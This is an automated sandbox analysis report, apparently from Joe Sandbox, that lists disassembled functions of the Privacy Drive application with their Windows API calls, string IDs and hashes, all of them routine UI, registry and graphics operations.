                                • API String ID: 3702945584-2174588135
                                • Opcode ID: 79fb52621954d3fb78e543622caf05ed8ea85ff9978e277aaa43c95a22e0e1da
                                • Instruction ID: 25f4ce58266ebb0ed9df831637feb6a591a22c29c147037c3482931c5dc3d598
                                • Opcode Fuzzy Hash: 79fb52621954d3fb78e543622caf05ed8ea85ff9978e277aaa43c95a22e0e1da
                                • Instruction Fuzzy Hash: 869188709103589EEB20EF54CC49BDEBBB4BF45718F504199E508BB282D7745B84CFA6
                                Function 00437B90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 00437BDD
                                • SetWindowPos.USER32(00000000), ref: 00437C00
                                  • Part of subcall function 00439B20: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00439B58
                                • SetWindowPos.USER32(00000000), ref: 00437DB1
                                • ShowWindow.USER32(00000000), ref: 00437DBD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Window$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exceptionRectShow
                                • String ID: 4[
                                • API String ID: 2853482114-2135906705
                                • Opcode ID: 84b63916d7adf2e67d32986b7a000f2952426d7115598657cef8e05939c4c294
                                • Instruction ID: f88acbd0015810147a0396ce29eb217f2978efc4e893c482084cd6a8c9b6fe4c
                                • Opcode Fuzzy Hash: 84b63916d7adf2e67d32986b7a000f2952426d7115598657cef8e05939c4c294
                                • Instruction Fuzzy Hash: 5461A370204301DFD764EF28C859BAABBE5FF88314F10596EF5968B3A1DB78A804CB55
                                Function 004A75F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 181COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                • EnterCriticalSection.KERNEL32(005BE2CC,?,?,?,?,?,?,00000000,00000000), ref: 004A766C
                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 004A773A
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                  • Part of subcall function 004A6B80: DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                  • Part of subcall function 004A6B80: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                  • Part of subcall function 004A6B80: LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                  • Part of subcall function 004A6B80: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                  • Part of subcall function 004A6B80: LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                • EnumWindows.USER32(Function_00001500,?), ref: 004A778D
                                • EnumWindows.USER32(004A7820,?), ref: 004A7799
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveMessagePeek$EnumWindows$Concurrency::details::_Concurrent_queue_base_v4::_ControlDeviceInternal_throw_exception
                                • String ID: list<T> too long
                                • API String ID: 3016200981-4027344264
                                • Opcode ID: 5b1af98e30a764c033c028efd539e04e818c7ec6fbb095fcb2a916587c88fa69
                                • Instruction ID: 56bc04989fab07b3bb9b6566eda9424b4fbee7646f229446e837d79c6703114c
                                • Opcode Fuzzy Hash: 5b1af98e30a764c033c028efd539e04e818c7ec6fbb095fcb2a916587c88fa69
                                • Instruction Fuzzy Hash: 956199B46087018FC720DF28C884A5ABBE4FF9A714F14466EF959CB361D738E944CB96
                                Function 0040D5A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 178COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0040E530: _memmove.LIBCMT ref: 0040E5A4
                                • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 0040D7DD
                                  • Part of subcall function 00401C40: _memmove.LIBCMT ref: 00401CCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$ChangeNotify
                                • String ID: !@$%s%s$Privacy Drive$pdv.ico
                                • API String ID: 1880328021-1887578971
                                • Opcode ID: 197c7df9783695546f8ec353bc5f4195fb4fcdb933b5f6b49561bf1dbda42f9e
                                • Instruction ID: a484dc032fc2894d9f904c88144a76d52c1ebb910f2420f10820118e3c17c107
                                • Opcode Fuzzy Hash: 197c7df9783695546f8ec353bc5f4195fb4fcdb933b5f6b49561bf1dbda42f9e
                                • Instruction Fuzzy Hash: BA811570D04248EEDF10DFE9C959BDEBBB0BF14318F204529E014B7291D7B92A48CBA6
                                Function 004B50A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 140registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCloseKey.ADVAPI32(?,7563D392), ref: 004B511E
                                • RegCreateKeyExW.ADVAPI32(80000001,Software\Cybertron\Privacy Drive,?,?,?,0002001F,?,005BE250,00000000,7563D392), ref: 004B5145
                                • RegCloseKey.ADVAPI32(00000000), ref: 004B5223
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Close$Create
                                • String ID: 4[$Software\Cybertron\Privacy Drive
                                • API String ID: 359002179-1004237525
                                • Opcode ID: 1d4b454dd639f5500d250ce712c737f673ec46d4253e1cfd212f116c70e7db5e
                                • Instruction ID: 7fc5252bc8dff4fcc8be655ec8b191145f753d9561629634891003532d1dffe7
                                • Opcode Fuzzy Hash: 1d4b454dd639f5500d250ce712c737f673ec46d4253e1cfd212f116c70e7db5e
                                • Instruction Fuzzy Hash: 09519570A00219AFEB24DF65CC45BAEBBB4FB04704F1041AEE405A73C2E7B56948CF64
                                Function 004302C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 122registryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorW.USER32(00000000,00007F00), ref: 004304BD
                                • RegisterClassExW.USER32(00000030), ref: 004304E6
                                • __CxxThrowException@8.LIBCMT ref: 00430501
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$T@W
                                • API String ID: 124629159-647002828
                                • Opcode ID: ecc3f5c7a7f9f0bdd00b6177ce578745c6a1a0604df76345d6ebbd26b85f8c7e
                                • Instruction ID: ce70b3ebfc1e80b7253cdaebd5798b6749c21fb3ed692d023f7c27f5bbe3783a
                                • Opcode Fuzzy Hash: ecc3f5c7a7f9f0bdd00b6177ce578745c6a1a0604df76345d6ebbd26b85f8c7e
                                • Instruction Fuzzy Hash: A561E2B0805388DEEB11CF64C55879ABFF4BF05308F24858DD059AB391D3BA9A0ADF91
                                Function 004435A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A12FF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1317
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1330
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,0000000A,00000000,?,0000001D,?,FF323232), ref: 004A140B
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawLinePen1SolidStyle
                                • String ID: @
                                • API String ID: 1390250770-2766056989
                                • Opcode ID: 1487fdf0435f6f3ae28c5813eefbb62a2b686aca0d601e20f29032d52ab73e47
                                • Instruction ID: 14b28f633d388a5baa52ddcafb55058c1eeb352d5ebb892b816658f15592212f
                                • Opcode Fuzzy Hash: 1487fdf0435f6f3ae28c5813eefbb62a2b686aca0d601e20f29032d52ab73e47
                                • Instruction Fuzzy Hash: 58419F75208345AFD714CF14CC45F9BBBE8FB99754F000A2EF955A62E0D770A908CB9A
                                Function 0044E000 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A12FF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1317
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1330
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,0000000A,00000000,?,0000001D,?,FF323232), ref: 004A140B
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawLinePen1SolidStyle
                                • String ID: @
                                • API String ID: 1390250770-2766056989
                                • Opcode ID: df780c9b89806ddd2244de07eae6b77a6dd4d85a52d1d2217e0446241a266bbd
                                • Instruction ID: b7abb43a99e67582e8b9c6702a6cb53732e53b392afc1180374469986e2ec2a6
                                • Opcode Fuzzy Hash: df780c9b89806ddd2244de07eae6b77a6dd4d85a52d1d2217e0446241a266bbd
                                • Instruction Fuzzy Hash: 77418F75208345AFD710CF14CC45F9ABBE8FB99764F10062EF955A62E0D770E908CB9A
                                Function 00417960 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101registryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorW.USER32(00000000), ref: 00417AC6
                                • RegisterClassExW.USER32(00000030), ref: 00417AEF
                                • __CxxThrowException@8.LIBCMT ref: 00417B0A
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$cbfx_SplashWnd
                                • API String ID: 124629159-3122380756
                                • Opcode ID: 113595fb88b07ce60ec2703353012f5eeacafe8248899689eea7b4a18912b07c
                                • Instruction ID: 9542e0f460d70c1d8dbdb4c5b38097e2f22e6357aca21166d9c86274e27858fe
                                • Opcode Fuzzy Hash: 113595fb88b07ce60ec2703353012f5eeacafe8248899689eea7b4a18912b07c
                                • Instruction Fuzzy Hash: A751D1B0805389DEEB01CF54C95879ABFF4BF06308F248589D0586F291D7BA9A4ACF90
                                Function 00433670 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100registryCOMMON
                                Download Yara Rule
                                APIs
                                • LoadCursorW.USER32(00000000), ref: 004337E0
                                • RegisterClassExW.USER32(00000030), ref: 00433809
                                • __CxxThrowException@8.LIBCMT ref: 00433824
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$cbfx_RegistrationReminderMiniWnd
                                • API String ID: 124629159-1075444511
                                • Opcode ID: 0c4f07d3c3c0b5ac19bb10889e5a2d81d977fdc6205c29ad623ec6d496be10a3
                                • Instruction ID: a3992295d61452cf69781cd4accdc83b249b2407783834dd3bd975dfe31615ae
                                • Opcode Fuzzy Hash: 0c4f07d3c3c0b5ac19bb10889e5a2d81d977fdc6205c29ad623ec6d496be10a3
                                • Instruction Fuzzy Hash: 8351D0B0801349DEEB01CF94D95879ABFF4BF06318F248589D0586F291D7BA9A4ADFD0
                                Function 004ADB00 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memsetwsprintf
                                • String ID: %c:\$<
                                • API String ID: 3493700554-478571147
                                • Opcode ID: 6084ed1ff51993e149087e6dff073fe78f30ec2c13822eaede7cfea5e037a762
                                • Instruction ID: f8c163834a8a136e8ec3b63d872f8b19b2dcb2447af848c5c16db35138203809
                                • Opcode Fuzzy Hash: 6084ed1ff51993e149087e6dff073fe78f30ec2c13822eaede7cfea5e037a762
                                • Instruction Fuzzy Hash: 3731A070A00205CFCB14EF98C948BEE7BF4BF16318F5846BAE50A9F691D775A906CB14
                                Function 00485890 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExecuteShell_memsetwsprintf
                                • String ID: %C:\$<
                                • API String ID: 3493700554-3712435599
                                • Opcode ID: 1a66108f81932dfaf5d9ae393771bdb4bcf007a754af5fc39174f002ea827423
                                • Instruction ID: c50ab5cbf75ea898c6c6c830dec49c4c10a419fac09e75cca50b364537ea767c
                                • Opcode Fuzzy Hash: 1a66108f81932dfaf5d9ae393771bdb4bcf007a754af5fc39174f002ea827423
                                • Instruction Fuzzy Hash: BE010CB5D0034DDBDB00DFD0D849BDEBBB8BB08308F50416AE505AB280EB749609DB55
                                Function 004D3530 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,005BDD4C,0041D3DB), ref: 004D354A
                                • GetProcAddress.KERNEL32(00000000), ref: 004D3551
                                • GetCurrentProcess.KERNEL32(005BE4E0), ref: 004D3562
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
